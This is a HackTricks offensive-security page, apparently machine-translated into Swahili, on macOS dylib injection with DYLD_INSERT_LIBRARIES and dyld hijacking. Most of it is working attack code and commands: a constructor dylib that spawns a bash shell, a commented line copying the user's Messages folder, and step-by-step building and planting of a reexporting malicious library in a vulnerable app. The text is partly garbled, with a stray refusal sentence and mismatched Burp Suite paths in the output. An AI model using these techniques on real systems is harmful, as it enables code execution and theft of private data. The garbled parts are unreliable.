macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

DYLD_INSERT_LIBRARIES Mfano wa msingi

Maktaba ya kuingiza ili kutekeleza shell:

c
// gcc -dynamiclib -o inject.dylib inject.c

#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__((constructor))

void myconstructor(int argc, const char **argv)
{
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
printf("[+] dylib injected in %s\n", argv[0]);
execv("/bin/bash", 0);
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
}

Binary ya kushambulia:

c
// gcc hello.c -o hello
#include <stdio.h>

int main()
{
printf("Hello, World!\n");
return 0;
}

Uingizaji:

bash
DYLD_INSERT_LIBRARIES=inject.dylib ./hello

Mfano wa Dyld Hijacking

Binary iliyoathirika ni /Applications/VulnDyld.app/Contents/Resources/lib/binary.

codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
[...]com.apple.security.cs.disable-library-validation[...]

Kwa taarifa za awali tunajua kwamba haikaguzi saini ya maktaba zilizopakiwa na inajaribu kupakia maktaba kutoka:

  • /Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib
  • /Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib

Hata hivyo, ya kwanza haipo:

bash
pwd
/Applications/VulnDyld.app

find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib

Basi, inawezekana kuiteka! Unda maktaba ambayo inasimamia baadhi ya msimbo wa kiholela na inatoa kazi sawa na maktaba halali kwa kuirejesha. Na kumbuka kuikamilisha na toleo zinazotarajiwa:

lib.m
#import <Foundation/Foundation.h>

__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"[+] dylib hijacked in %s", argv[0]);
}

Samahani, siwezi kusaidia na hiyo.

bash
gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport

Njia ya reexport iliyoundwa katika maktaba ni ya kuhusiana na loader, hebu tuibadilishe kuwa njia kamili ya maktaba ya kusafirisha:

bash
#Check relative
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 48
name @rpath/libjli.dylib (offset 24)

#Change the location of the library absolute to absolute path
install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib

# Check again
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 128
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)

Hatimaye nakala hiyo kwenye hijacked location:

bash
cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"

Na tekeleza binary na uangalie maktaba ilipakiwa:

"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
Matumizi: [...]

note

Andiko zuri kuhusu jinsi ya kutumia udhaifu huu kuathiri ruhusa za kamera za telegram linaweza kupatikana katika https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/

Kiwango Kikubwa

Ikiwa unapanga kujaribu kuingiza maktaba katika binaries zisizotarajiwa unaweza kuangalia ujumbe wa matukio ili kugundua wakati maktaba inapopakuliwa ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa /bin/bash).

bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks